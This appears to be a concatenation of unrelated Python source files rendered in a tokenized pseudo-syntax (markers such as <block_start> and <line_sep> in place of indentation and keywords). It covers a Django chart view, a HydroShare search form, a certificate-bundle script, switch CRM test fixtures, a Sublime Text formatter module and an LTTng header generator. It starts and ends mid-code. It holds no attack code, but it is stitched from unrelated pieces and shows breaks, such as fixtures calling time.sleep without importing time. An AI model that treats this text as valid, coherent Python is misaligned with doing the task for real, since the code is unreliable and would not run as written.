**kwargs<block_start>app=kwargs['app']<try_stmt><block_start>zentral_app=apps.app_configs[app]<line_sep>search_dict=getattr(zentral_app.events_module "ALL_EVENTS_SEARCH_DICT")<block_end><except_stmt>(KeyError AttributeError)<block_start><raise>Http404<block_end>interval=kwargs["interval"]<try_stmt><block_start>date_format=self.INTERVAL_DATE_FORMAT[interval]<block_end><except_stmt>KeyError<block_start><raise>Http404<block_end>labels=[]<line_sep>event_count_data=[]<line_sep>unique_msn_data=[]<for_stmt>dt,event_count,unique_msn frontend_store.get_app_hist_data(interval int(kwargs["bucket_number"]) **search_dict)<block_start>labels.append(dt.strftime(date_format))<line_sep>event_count_data.append(event_count)<line_sep>unique_msn_data.append(unique_msn)<block_end>datasets={"event_count":{"label":"{} 
events".format(app) "backgroundColor":"rgba(122, 182, 160, 0.7)" "data":event_count_data} "unique_msn":{"label":"{} machines".format(app) "backgroundColor":"rgba(225, 100, 86, 0.7)" "data":unique_msn_data}}<line_sep><return>JsonResponse({"app":app "labels":labels "datasets":datasets})<block_end><block_end>
<import_from_stmt>haystack.forms FacetedSearchForm<import_from_stmt>haystack.query SQ<import_from_stmt>django forms<import_from_stmt>hs_core.discovery_parser ParseSQ MatchingBracketsNotFoundError FieldNotRecognizedError InequalityNotAllowedError MalformedDateError<line_sep>FACETS_TO_SHOW=['creator' 'contributor' 'owner' 'content_type' 'subject' 'availability']<class_stmt>DiscoveryForm(FacetedSearchForm)<block_start>SORT_ORDER_VALUES=('title' 'author' 'created' 'modified')<line_sep>SORT_ORDER_CHOICES=(('title' 'Title') ('author' 'First Author') ('created' 'Date Created') ('modified' 'Last Modified'))<line_sep>SORT_DIRECTION_VALUES=('' '-')<line_sep>SORT_DIRECTION_CHOICES=(('' 'Ascending') ('-' 'Descending'))<line_sep>NElat=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>NElng=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>SWlat=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>SWlng=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>start_date=forms.DateField(label='From Date' required=<false>)<line_sep>end_date=forms.DateField(label='To Date' required=<false>)<line_sep>coverage_type=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>sort_order=forms.CharField(label='Sort By:' widget=forms.Select(choices=SORT_ORDER_CHOICES) required=<false>)<line_sep>sort_direction=forms.CharField(label='Sort Direction:' widget=forms.Select(choices=SORT_DIRECTION_CHOICES) required=<false>)<def_stmt>search self<block_start>self.parse_error=<none># error return from parser sqs=self.searchqueryset.all().filter(replaced=<false>)<if_stmt>self.cleaned_data.get('q')# The prior code corrected for an failed match of complete words, as documented # in issue #2308. This version instead uses an advanced query syntax in which # "word" indicates an exact match and the bare word indicates a stemmed match. 
<block_start>cdata=self.cleaned_data.get('q')<try_stmt><block_start>parser=ParseSQ()<line_sep>parsed=parser.parse(cdata)<line_sep>sqs=sqs.filter(parsed)<block_end><except_stmt>ValueError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error="Value error: {}. No matches. Please try again".format(e.value)<line_sep><return>sqs<block_end><except_stmt>MatchingBracketsNotFoundError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error="{} No matches. Please try again.".format(e.value)<line_sep><return>sqs<block_end><except_stmt>MalformedDateError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error="{} No matches. Please try again.".format(e.value)<line_sep><return>sqs<block_end><except_stmt>FieldNotRecognizedError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error=("{} Field delimiters include title, contributor, subject, etc. "+"Please try again.").format(e.value)<line_sep><return>sqs<block_end><except_stmt>InequalityNotAllowedError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error="{} No matches. 
Please try again.".format(e.value)<line_sep><return>sqs<block_end><block_end>geo_sq=<none><if_stmt>self.cleaned_data['NElng']<and>self.cleaned_data['SWlng']<block_start><if_stmt>float(self.cleaned_data['NElng'])<g>float(self.cleaned_data['SWlng'])<block_start>geo_sq=SQ(east__lte=float(self.cleaned_data['NElng']))<line_sep>geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])) SQ.AND)<block_end><else_stmt><block_start>geo_sq=SQ(east__gte=float(self.cleaned_data['SWlng']))<line_sep>geo_sq.add(SQ(east__lte=float(180)) SQ.OR)<line_sep>geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])) SQ.AND)<line_sep>geo_sq.add(SQ(east__gte=float(-180)) SQ.AND)<block_end><block_end><if_stmt>self.cleaned_data['NElat']<and>self.cleaned_data['SWlat']# latitude might be specified without longitude <block_start><if_stmt>geo_sq<is><none><block_start>geo_sq=SQ(north__lte=float(self.cleaned_data['NElat']))<block_end><else_stmt><block_start>geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])) SQ.AND)<block_end>geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])) SQ.AND)<block_end><if_stmt>geo_sq<is><not><none><block_start>sqs=sqs.filter(geo_sq)<block_end># Check to see if a start_date was chosen. 
start_date=self.cleaned_data['start_date']<line_sep>end_date=self.cleaned_data['end_date']<line_sep># allow overlapping ranges # cs < s < ce OR s < cs => s < ce # AND # cs < e < ce OR e > ce => cs < e <if_stmt>start_date<and>end_date<block_start>sqs=sqs.filter(SQ(end_date__gte=start_date)&SQ(start_date__lte=end_date))<block_end><elif_stmt>start_date<block_start>sqs=sqs.filter(SQ(end_date__gte=start_date))<block_end><elif_stmt>end_date<block_start>sqs=sqs.filter(SQ(start_date__lte=end_date))<block_end><if_stmt>self.cleaned_data['coverage_type']<block_start>sqs=sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']])<block_end>creator_sq=<none><line_sep>contributor_sq=<none><line_sep>owner_sq=<none><line_sep>subject_sq=<none><line_sep>content_type_sq=<none><line_sep>availability_sq=<none><line_sep># We need to process each facet to ensure that the field name and the # value are quoted correctly and separately: <for_stmt>facet self.selected_facets<block_start><if_stmt>":"<not><in>facet<block_start><continue><block_end>field,value=facet.split(":" 1)<line_sep>value=sqs.query.clean(value)<if_stmt>value<block_start><if_stmt>"creator"<in>field<block_start><if_stmt>creator_sq<is><none><block_start>creator_sq=SQ(creator__exact=value)<block_end><else_stmt><block_start>creator_sq.add(SQ(creator__exact=value) SQ.OR)<block_end><block_end><if_stmt>"contributor"<in>field<block_start><if_stmt>contributor_sq<is><none><block_start>contributor_sq=SQ(contributor__exact=value)<block_end><else_stmt><block_start>contributor_sq.add(SQ(contributor__exact=value) SQ.OR)<block_end><block_end><elif_stmt>"owner"<in>field<block_start><if_stmt>owner_sq<is><none><block_start>owner_sq=SQ(owner__exact=value)<block_end><else_stmt><block_start>owner_sq.add(SQ(owner__exact=value) 
SQ.OR)<block_end><block_end><elif_stmt>"subject"<in>field<block_start><if_stmt>subject_sq<is><none><block_start>subject_sq=SQ(subject__exact=value)<block_end><else_stmt><block_start>subject_sq.add(SQ(subject__exact=value) SQ.OR)<block_end><block_end><elif_stmt>"content_type"<in>field<block_start><if_stmt>content_type_sq<is><none><block_start>content_type_sq=SQ(content_type__exact=value)<block_end><else_stmt><block_start>content_type_sq.add(SQ(content_type__exact=value) SQ.OR)<block_end><block_end><elif_stmt>"availability"<in>field<block_start><if_stmt>availability_sq<is><none><block_start>availability_sq=SQ(availability__exact=value)<block_end><else_stmt><block_start>availability_sq.add(SQ(availability__exact=value) SQ.OR)<block_end><block_end><else_stmt><block_start><continue><block_end><block_end><block_end><if_stmt>creator_sq<is><not><none><block_start>sqs=sqs.filter(creator_sq)<block_end><if_stmt>contributor_sq<is><not><none><block_start>sqs=sqs.filter(contributor_sq)<block_end><if_stmt>owner_sq<is><not><none><block_start>sqs=sqs.filter(owner_sq)<block_end><if_stmt>subject_sq<is><not><none><block_start>sqs=sqs.filter(subject_sq)<block_end><if_stmt>content_type_sq<is><not><none><block_start>sqs=sqs.filter(content_type_sq)<block_end><if_stmt>availability_sq<is><not><none><block_start>sqs=sqs.filter(availability_sq)<block_end><return>sqs<block_end><block_end>
<import_stmt>requests<import_stmt>os<line_sep>EXISTING_ROOT_PEM=requests.certs.where()<line_sep>root_dir=os.path.abspath(os.path.join(os.path.abspath(__file__) ".." ".." ".."))<line_sep>LOCAL_DEV_CERT=os.path.abspath(os.path.join(root_dir 'eng' 'common' 'testproxy' 'dotnet-devcert.crt'))<line_sep>COMBINED_FILENAME=os.path.basename(LOCAL_DEV_CERT).split(".")[0]+".pem"<line_sep>COMBINED_FOLDER=os.path.join(root_dir '.certificate')<line_sep>COMBINED_LOCATION=os.path.join(COMBINED_FOLDER COMBINED_FILENAME)<def_stmt>copy_cert_content <block_start><with_stmt>open(LOCAL_DEV_CERT 'r')<as>f<block_start>data=f.read()<block_end><if_stmt><not>os.path.exists(COMBINED_FOLDER)<block_start>os.mkdir(COMBINED_FOLDER)<block_end><with_stmt>open(COMBINED_LOCATION 'w')<as>f<block_start>f.write(data)<block_end><block_end><def_stmt>combine_cert_file <block_start><with_stmt>open(EXISTING_ROOT_PEM 'r')<as>f<block_start>content=f.readlines()<line_sep><block_end><with_stmt>open(COMBINED_LOCATION 'a')<as>f<block_start>f.writelines(content)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>copy_cert_content()<line_sep>combine_cert_file()<line_sep>print("Set the following certificate paths:")<line_sep>print("\tSSL_CERT_DIR={}".format(os.path.dirname(COMBINED_LOCATION)))<line_sep>print("\tREQUESTS_CA_BUNDLE={}".format(COMBINED_LOCATION))<if_stmt>os.getenv('TF_BUILD' <false>)<block_start>print("##vso[task.setvariable variable=SSL_CERT_DIR]{}".format(os.path.dirname(COMBINED_LOCATION)))<line_sep>print("##vso[task.setvariable variable=REQUESTS_CA_BUNDLE]{}".format(COMBINED_LOCATION))<block_end><block_end>
<import_stmt>logging<import_stmt>pytest<import_from_stmt>tests.common.utilities wait_until<import_from_stmt>utils get_crm_resources check_queue_status sleep_to_wait<line_sep>CRM_POLLING_INTERVAL=1<line_sep>CRM_DEFAULT_POLL_INTERVAL=300<line_sep>MAX_WAIT_TIME=120<line_sep>logger=logging.getLogger(__name__)<line_sep>@pytest.fixture(scope='module')<def_stmt>get_function_conpleteness_level pytestconfig<block_start><return>pytestconfig.getoption("--completeness_level")<block_end>@pytest.fixture(scope="module" autouse=<true>)<def_stmt>set_polling_interval duthost<block_start>wait_time=2<line_sep>duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))<line_sep>logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))<line_sep>time.sleep(wait_time)<line_sep><yield><line_sep>duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))<line_sep>logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))<line_sep>time.sleep(wait_time)<block_end>@pytest.fixture(scope='module')<def_stmt>withdraw_and_announce_existing_routes duthost localhost tbinfo<block_start>ptf_ip=tbinfo["ptf_ip"]<line_sep>topo_name=tbinfo["topo"]["name"]<line_sep>logger.info("withdraw existing ipv4 and ipv6 routes")<line_sep>localhost.announce_routes(topo_name=topo_name ptf_ip=ptf_ip action="withdraw" path="../ansible/")<line_sep>wait_until(MAX_WAIT_TIME CRM_POLLING_INTERVAL 0 <lambda>:check_queue_status(duthost "inq")<eq><true>)<line_sep>sleep_to_wait(CRM_POLLING_INTERVAL<times>100)<line_sep>ipv4_route_used_before=get_crm_resources(duthost "ipv4_route" "used")<line_sep>ipv6_route_used_before=get_crm_resources(duthost "ipv6_route" "used")<line_sep>logger.info("ipv4 route used {}".format(ipv4_route_used_before))<line_sep>logger.info("ipv6 route used {}".format(ipv6_route_used_before))<line_sep><yield>ipv4_route_used_before ipv6_route_used_before<line_sep>logger.info("announce existing ipv4 and ipv6 
routes")<line_sep>localhost.announce_routes(topo_name=topo_name ptf_ip=ptf_ip action="announce" path="../ansible/")<line_sep>wait_until(MAX_WAIT_TIME CRM_POLLING_INTERVAL 0 <lambda>:check_queue_status(duthost "outq")<eq><true>)<line_sep>sleep_to_wait(CRM_POLLING_INTERVAL<times>5)<line_sep>logger.info("ipv4 route used {}".format(get_crm_resources(duthost "ipv4_route" "used")))<line_sep>logger.info("ipv6 route used {}".format(get_crm_resources(duthost "ipv6_route" "used")))<block_end>
# @author <NAME> # @copyright Copyright (c) 2008-2015, <NAME> aka LONGMAN (<EMAIL>) # @link http://longman.me # @license The MIT License (MIT) <import_stmt>os<import_stmt>sys<import_stmt>re<import_stmt>sublime<line_sep>directory=os.path.dirname(os.path.realpath(__file__))<line_sep>libs_path=os.path.join(directory 'lib')<if_stmt>libs_path<not><in>sys.path<block_start>sys.path.append(libs_path)<block_end><try_stmt># Python 3 <block_start><import_from_stmt>.phpformatter PhpFormatter<import_from_stmt>.jsformatter JsFormatter<import_from_stmt>.htmlformatter HtmlFormatter<import_from_stmt>.cssformatter CssFormatter<import_from_stmt>.scssformatter ScssFormatter<import_from_stmt>.pyformatter PyFormatter<import_from_stmt>.vbscriptformatter VbscriptFormatter<import_from_stmt>.coldfusionformatter ColdfusionFormatter<import_from_stmt>.goformatter GoFormatter<block_end><except_stmt>(ValueError)# Python 2 <block_start><import_from_stmt>phpformatter PhpFormatter<import_from_stmt>jsformatter JsFormatter<import_from_stmt>htmlformatter HtmlFormatter<import_from_stmt>cssformatter CssFormatter<import_from_stmt>scssformatter ScssFormatter<import_from_stmt>pyformatter PyFormatter<import_from_stmt>vbscriptformatter VbscriptFormatter<import_from_stmt>coldfusionformatter ColdfusionFormatter<import_from_stmt>goformatter GoFormatter<block_end><class_stmt>Formatter<block_start><def_stmt>__init__ self view syntax=<none><block_start>self.platform=sublime.platform()<line_sep>self.classmap={}<line_sep>self.st_version=2<if_stmt>sublime.version()<eq>''<or>int(sublime.version())<g>3000<block_start>self.st_version=3<block_end>self.file_name=view.file_name()<line_sep>self.settings=sublime.load_settings('CodeFormatter.sublime-settings')<line_sep>self.packages_path=sublime.packages_path()<line_sep>self.syntax_file=view.settings().get('syntax')<line_sep>self.syntax=syntax<or>self.get_syntax()<line_sep># map of settings names with related class map_settings_formatter=[('codeformatter_php_options' 
PhpFormatter) ('codeformatter_js_options' JsFormatter) ('codeformatter_css_options' CssFormatter) ('codeformatter_html_options' HtmlFormatter) ('codeformatter_python_options' PyFormatter) ('codeformatter_vbscript_options' VbscriptFormatter) ('codeformatter_scss_options' ScssFormatter) ('codeformatter_coldfusion_options' ColdfusionFormatter) ('codeformatter_go_options' GoFormatter) ]<for_stmt>name,_class map_settings_formatter<block_start>syntaxes=self.settings.get(name {}).get('syntaxes')<if_stmt><not>syntaxes<or><not>isinstance(syntaxes str)<block_start><continue><block_end><for_stmt>_formatter syntaxes.split(',')<block_start>self.classmap[_formatter.strip()]=_class<block_end><block_end><block_end><def_stmt>format self text<block_start>formatter=self.classmap[self.syntax](self)<try_stmt><block_start>stdout,stderr=formatter.format(text)<block_end><except_stmt>Exception<as>e<block_start>stdout=''<line_sep>stderr=str(e)<block_end><return>self.clean(stdout) self.clean(stderr)<block_end><def_stmt>exists self<block_start><return>self.syntax<in>self.classmap<block_end><def_stmt>get_syntax self<block_start>pattern=re.compile(r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')<line_sep>m=pattern.search(self.syntax_file)<line_sep>found=''<if_stmt>m<and>len(m.groups())<g>0<block_start>found=m.groups()[0]<block_end><return>found.lower()<block_end><def_stmt>format_on_save_enabled self<block_start><if_stmt><not>self.exists()<block_start><return><false><block_end>formatter=self.classmap[self.syntax](self)<line_sep><return>formatter.format_on_save_enabled(self.file_name)<block_end><def_stmt>clean self string<block_start><if_stmt>hasattr(string 'decode')<block_start>string=string.decode('UTF-8' 'ignore')<block_end><return>re.sub(r'\r\n|\r' '\n' string)<block_end><block_end>
#------------------------------------------------------------------------------------------------------- # Copyright (C) Microsoft. All rights reserved. # Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. #------------------------------------------------------------------------------------------------------- <import_stmt>xml.dom.minidom<as>DOM<line_sep>lttngDataTypeMapping={"win:null":" " "win:Int64":"const __int64" "win:ULong":"const unsigned long" "win:count":"*" "win:Struct":"const char *" "win:GUID":"const int" "win:AnsiString":"const char*" "win:UnicodeString":"const char*" "win:Double":"const double" "win:Int32":"const signed int" "win:HexInt32":"const signed int" "win:Boolean":"const bool" "win:UInt64":"const unsigned __int64" "win:UInt32":"const unsigned int" "win:UInt16":"const unsigned short" "win:UInt8":"const unsigned char" "win:Int8":"const char" "win:Pointer":"const uintptr_t" "win:Binary":"const char"}<line_sep>ctfDataTypeMapping={"win:Int64":"ctf_integer" "win:HexInt64":"ctf_integer_hex" "win:ULong":"ctf_integer" "win:count":"ctf_sequence" "win:Struct":"ctf_sequence" "win:GUID":"ctf_sequence" "win:AnsiString":"ctf_string" "win:UnicodeString":"ctf_string" "win:Double":"ctf_float" "win:Int32":"ctf_integer" "win:HexInt32":"ctf_integer_hex" "win:Boolean":"ctf_integer" "win:UInt64":"ctf_integer" "win:UInt32":"ctf_integer" "win:UInt16":"ctf_integer" "win:HexInt16":"ctf_integer_hex" "win:UInt8":"ctf_integer" #actually a character "win:Int8":"ctf_integer" #actually a character "win:Pointer":"ctf_integer" "win:Binary":"ctf_sequence" "xs:string":"ctf_string" "xs:unsignedLong":"ctf_integer" "xs:unsignedInt":"ctf_integer"}<line_sep>palDataTypeMapping={"win:null":" " "win:Int64":"const __int64" "win:ULong":"const unsigned long" "win:count":"*" "win:Struct":"const void" "win:GUID":"const GUID" "win:AnsiString":"LPCSTR" "win:UnicodeString":"PCWSTR" "win:Double":"const double" "win:Int32":"const signed int" 
"win:HexInt32":"const signed int" "win:Boolean":"const bool" "win:UInt64":"const unsigned __int64" "win:UInt32":"const unsigned int" "win:UInt16":"const unsigned short" "win:UInt8":"const unsigned char" "win:Int8":"const char" "win:Pointer":"const void*" "win:Binary":"const char"}<line_sep>MAX_LTTNG_ARGS=10<def_stmt>getParamSequenceSize paramSequence estimate<block_start>total=0<line_sep>pointers=0<for_stmt>param paramSequence<block_start><if_stmt>param<in>["win:Int64" "win:UInt64" "win:Double"]<block_start>total<augadd>8<block_end><elif_stmt>param<in>["win:ULong" "win:Int32" "win:Boolean" ]<block_start>total<augadd>4<block_end><elif_stmt>param<eq>"GUID"<block_start>total<augadd>16<block_end><elif_stmt>param<in>["win:UInt16"]<block_start>total<augadd>2<block_end><elif_stmt>param<in>["win:Uint8" "win:Binary"]<block_start>total<augadd>1<block_end><elif_stmt>param<eq>"win:Pointer"<block_start><if_stmt>estimate<block_start>total<augadd>8<block_end><else_stmt><block_start>pointers<augadd>1<block_end><block_end><elif_stmt>estimate<block_start><if_stmt>param<in>["win:AnsiString" "win:Struct"]<block_start>total<augadd>32<block_end><elif_stmt>param<in>["win:UnicodeString"]<block_start>total<augadd>64<block_end><block_end><else_stmt><block_start><raise>Exception("Don't know size of "+param)<block_end><block_end><if_stmt>estimate<block_start><return>total<block_end><return>total pointers<block_end><class_stmt>Template<block_start><def_stmt>__repr__ self<block_start><return>"<Template "+self.name+" />"<block_end><def_stmt>__init__ self name prototypes dependencies structCounts arrayCounts<block_start>self.name=name<line_sep>self.signature=FunctionSignature()<line_sep>self.structCounts=structCounts<line_sep>self.arrayCounts=arrayCounts<for_stmt>variable prototypes.paramList<block_start><for_stmt>dependency dependencies[variable]<block_start><if_stmt><not>self.signature.getParam(dependency)<block_start>self.signature.append(dependency 
prototypes.getParam(dependency))<block_end><block_end><block_end><block_end>@property<def_stmt>num_params self<block_start><return>len(self.signature.paramList)<block_end><def_stmt>getParam self name<block_start><return>self.signature.getParam(name)<block_end>@property<def_stmt>estimatedSize self<block_start>total=getParamSequenceSize((self.getParam(paramName).winType<for>paramName self.signature.paramList) <true>)<if_stmt>total<l>32<block_start><return>32<block_end><elif_stmt>total<g>1024<block_start><return>1024<block_end><return>total<block_end><block_end><class_stmt>FunctionSignature<block_start><def_stmt>__repr__ self<block_start><return>', '.join(self.paramList)<block_end><def_stmt>__init__ self<block_start>self.LUT={}<line_sep>self.paramList=[]<block_end><def_stmt>append self variable param<block_start>self.LUT[variable]=param<line_sep>self.paramList.append(variable)<block_end><def_stmt>getParam self variable<block_start><return>self.LUT.get(variable)<block_end><def_stmt>getLength self<block_start><return>len(self.paramList)<block_end><block_end><class_stmt>FunctionParameter<block_start><def_stmt>__repr__ self<block_start><return>self.name<block_end><def_stmt>__init__ self winType name count outType length<block_start>self.winType=winType<line_sep>self.outType=outType<line_sep>self.name=name<line_sep>self.length=length<line_sep>self.count="win:null"<if_stmt>winType<eq>"win:GUID"<or>count<eq>"win:count"<block_start>self.count="win:count"<block_end><block_end><block_end>ignoredXmlAttributes=frozenset(["map"])<line_sep>usedXmlAttributes=frozenset(["name" "inType" "count" "length" "outType"])<line_sep>knownXmlAttributes=ignoredXmlAttributes|usedXmlAttributes<def_stmt>checkKnownAttributes nodes templateName<block_start><for_stmt>node nodes<block_start>nodeMap=node.attributes<for_stmt>attribute nodeMap.values()<block_start><if_stmt>attribute.name<not><in>knownXmlAttributes<block_start><raise>ValueError('Unknown attribute: '+attribute.name+' in template 
'+templateName)<block_end><block_end><block_end><block_end><def_stmt>getTopLevelElementsByTagName node tag<block_start><return>[e<for>e node.getElementsByTagName(tag)<if>e.parentNode<eq>node]<block_end><def_stmt>parseTemplateNodes templateNodes<block_start>templates={}<for_stmt>templateNode templateNodes<block_start>templateName=templateNode.getAttribute('tid')<line_sep>dataNodes=getTopLevelElementsByTagName(templateNode 'data')<line_sep>checkKnownAttributes(dataNodes templateName)<line_sep>functionPrototypes=FunctionSignature()<line_sep>arrayCounts={}<line_sep>structCounts={}<line_sep>var_Dependencies={}<for_stmt>dataNode dataNodes<block_start>variable=dataNode.getAttribute('name')<line_sep>wintype=dataNode.getAttribute('inType')<line_sep>outType=dataNode.getAttribute('outType')<line_sep>wincount=dataNode.getAttribute('count')<line_sep>winLength=dataNode.getAttribute('length')<line_sep>var_dependency=[variable]<if_stmt>winLength<block_start><if_stmt>wincount<block_start><raise>Exception("Both count and length properties found on "+variable+" in template "+templateName)<block_end><block_end><if_stmt>wincount.isdigit()<and>int(wincount)<eq>1<block_start>wincount=''<block_end><if_stmt>wincount<block_start><if_stmt>wincount.isdigit()<block_start><raise>Exception("Expect constant count to be length")<block_end><elif_stmt>functionPrototypes.getParam(wincount)<block_start>var_dependency.insert(0 wincount)<line_sep>arrayCounts[variable]=wincount<block_end><block_end>var_Dependencies[variable]=var_dependency<line_sep>functionParameter=FunctionParameter(wintype variable wincount outType winLength)<line_sep>functionPrototypes.append(variable functionParameter)<block_end>structNodes=getTopLevelElementsByTagName(templateNode 'struct')<for_stmt>structNode structNodes<block_start>structName=structNode.getAttribute('name')<line_sep>countName=structNode.getAttribute('count')<assert_stmt>(countName<in>functionPrototypes.paramList)<line_sep>#childData = 
structNode.getElementsByTagName("data") #names = [x.attributes['name'].value for x in childData] #types = [x.attributes['inType'].value for x in childData] structCounts[structName]=countName<line_sep>var_Dependencies[structName]=[countName structName]<line_sep>functionParameterPointer=FunctionParameter("win:Struct" structName "win:count" <none> <none>)<line_sep>functionPrototypes.append(structName functionParameterPointer)<block_end>templates[templateName]=Template(templateName functionPrototypes var_Dependencies structCounts arrayCounts)<block_end><return>templates<block_end><def_stmt>shouldPackTemplate template<block_start><return>template.num_params<g>MAX_LTTNG_ARGS<or>len(template.structCounts)<g>0<or>len(template.arrayCounts)<g>0<block_end><def_stmt>generateArgList template# Construct a TP_ARGS macro call, as defined in another macro, e.g. # # TP_ARGS( \ # int, my_integer_arg, \ # char*, my_string_arg \ # ) <block_start>header="TP_ARGS( \\\n"<line_sep>footer="\\\n)"<line_sep>args=[]<if_stmt>shouldPackTemplate(template)<block_start>args.append(" const unsigned int, length")<line_sep>args.append(" const char *, __data__")<block_end><else_stmt><block_start>signature=template.signature<for_stmt>param signature.paramList<block_start>functionParam=signature.getParam(param)<line_sep>wintypeName=functionParam.winType<line_sep>mappedType=lttngDataTypeMapping[wintypeName]<line_sep>winCount=functionParam.count<line_sep>mappedCount=lttngDataTypeMapping[winCount]<line_sep>arg=" "+mappedType<if_stmt>mappedCount<ne>" "<block_start>arg<augadd>mappedCount<block_end><elif_stmt>functionParam.length<block_start>arg<augadd>"*"<block_end>arg<augadd>", "+functionParam.name<line_sep>args.append(arg)<block_end><block_end><return>header+", \\\n".join(args)+footer<block_end><def_stmt>generateFieldList template# Construct a TP_FIELDS macro call, e.g. 
# TP_FIELDS( # ctf_string(my_string_field, my_string_arg) # ctf_integer(int, my_integer_field, my_integer_arg) # ) <block_start>header=" "+" TP_FIELDS(\n"<line_sep>footer="\n )"<line_sep>fieldList=[]<if_stmt>shouldPackTemplate(template)<block_start>fieldList.append(" ctf_integer(unsigned long, length, length)")<line_sep>fieldList.append(" ctf_sequence(char, __data__, __data__, unsigned long, length)")<block_end><else_stmt><block_start>signature=template.signature<for_stmt>param signature.paramList<block_start>functionParam=signature.getParam(param)<line_sep>wintypeName=functionParam.winType<line_sep>winCount=functionParam.count<line_sep>mappedCount=lttngDataTypeMapping[winCount]<line_sep>mappedType=lttngDataTypeMapping[wintypeName].replace("const " "")<if_stmt>functionParam.outType<block_start>wintypeName=functionParam.outType<block_end>ctf_type=<none><line_sep>field_body=<none><line_sep>varname=functionParam.name<if_stmt>param<in>template.structCounts<or>param<in>template.arrayCounts# This is a struct, treat as a sequence <block_start>countVar=template.structCounts.get(param template.arrayCounts.get(param))<line_sep>ctf_type="ctf_sequence"<line_sep>field_body=", ".join((mappedType varname varname "size_t" functionParam.prop))<block_end><elif_stmt>functionParam.length<block_start>ctf_type="ctf_sequence"<line_sep>field_body=", ".join((mappedType varname varname "size_t" functionParam.length))<block_end><else_stmt><block_start>ctf_type=ctfDataTypeMapping[wintypeName]<if_stmt>ctf_type<eq>"ctf_string"<block_start>field_body=", ".join((varname varname))<block_end><elif_stmt>ctf_type<eq>"ctf_integer"<or>ctf_type<eq>"ctf_integer_hex"<or>ctf_type<eq>"ctf_float"<block_start>field_body=", ".join((mappedType varname varname))<block_end><elif_stmt>ctf_type<eq>"ctf_sequence"<block_start><raise>Exception("ctf_sequence needs special handling: "+template.name+" "+param)<block_end><else_stmt><block_start><raise>Exception("Unhandled ctf intrinsic: "+ctf_type)<block_end><block_end># 
fieldList.append("// " + wintypeName) fieldList.append(" %s(%s)"%(ctf_type field_body))<block_end><block_end><return>header+"\n".join(fieldList)+footer<block_end><def_stmt>generateLttngHeader providerName lttngEventHeaderShortName templates events<block_start>headerLines=[]<line_sep>headerLines.append("")<line_sep>headerLines.append("#ifdef __int64")<line_sep>headerLines.append("#if TARGET_64")<line_sep>headerLines.append("#undef __int64")<line_sep>headerLines.append("#else")<line_sep>headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"")<line_sep>headerLines.append("#endif // TARGET_64")<line_sep>headerLines.append("#endif // __int64")<line_sep>headerLines.append("#undef TRACEPOINT_PROVIDER")<line_sep>headerLines.append("#undef TRACEPOINT_INCLUDE")<line_sep>headerLines.append("")<line_sep>headerLines.append("#define TRACEPOINT_PROVIDER "+providerName+"\n")<line_sep>headerLines.append("#define TRACEPOINT_INCLUDE \"./"+lttngEventHeaderShortName+"\"\n\n")<line_sep>headerLines.append("#if !defined(LTTNG_CHAKRA_H"+providerName+") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n")<line_sep>headerLines.append("#define LTTNG_CHAKRA_H"+providerName+"\n")<line_sep>headerLines.append("\n#include <lttng/tracepoint.h>\n\n")<for_stmt>templateName templates<block_start>template=templates[templateName]<line_sep>functionSignature=template.signature<line_sep>headerLines.append("")<line_sep>headerLines.append("#define "+templateName+"_TRACEPOINT_ARGS \\")<line_sep>tracepointArgs=generateArgList(template)<line_sep>headerLines.append(tracepointArgs)<line_sep>headerLines.append("TRACEPOINT_EVENT_CLASS(")<line_sep>headerLines.append(" "+providerName+",")<line_sep>headerLines.append(" "+templateName+",")<line_sep>headerLines.append(" "+templateName+"_TRACEPOINT_ARGS,")<line_sep>tracepointFields=generateFieldList(template)<line_sep>headerLines.append(tracepointFields)<line_sep>headerLines.append(")")<line_sep>headerLines.append("#define 
"+templateName+"T_TRACEPOINT_INSTANCE(name) \\")<line_sep>headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")<line_sep>headerLines.append(" "+providerName+",\\")<line_sep>headerLines.append(" "+templateName+",\\")<line_sep>headerLines.append(" name,\\")<line_sep>headerLines.append(" "+templateName+"_TRACEPOINT_ARGS \\")<line_sep>headerLines.append(")")<block_end>headerLines.append("")<line_sep>headerLines.append("")<line_sep>headerLines.append("TRACEPOINT_EVENT_CLASS(")<line_sep>headerLines.append(" "+providerName+",")<line_sep>headerLines.append(" emptyTemplate,")<line_sep>headerLines.append(" TP_ARGS(),")<line_sep>headerLines.append(" TP_FIELDS()")<line_sep>headerLines.append(")")<line_sep>headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\")<line_sep>headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")<line_sep>headerLines.append(" "+providerName+",\\")<line_sep>headerLines.append(" emptyTemplate,\\")<line_sep>headerLines.append(" name,\\")<line_sep>headerLines.append(" TP_ARGS()\\")<line_sep>headerLines.append(")")<line_sep>headerLines.append("")<for_stmt>eventNode events<block_start>eventName=eventNode.getAttribute('symbol')<line_sep>templateName=eventNode.getAttribute('template')<if_stmt><not>eventName<block_start><raise>Exception(eventNode+" event does not have a symbol")<block_end><if_stmt><not>templateName<block_start>headerLines.append("T_TRACEPOINT_INSTANCE("+eventName+")")<line_sep><continue><block_end>headerLines.append(templateName+"T_TRACEPOINT_INSTANCE("+eventName+")")<block_end>headerLines.append("#endif /* 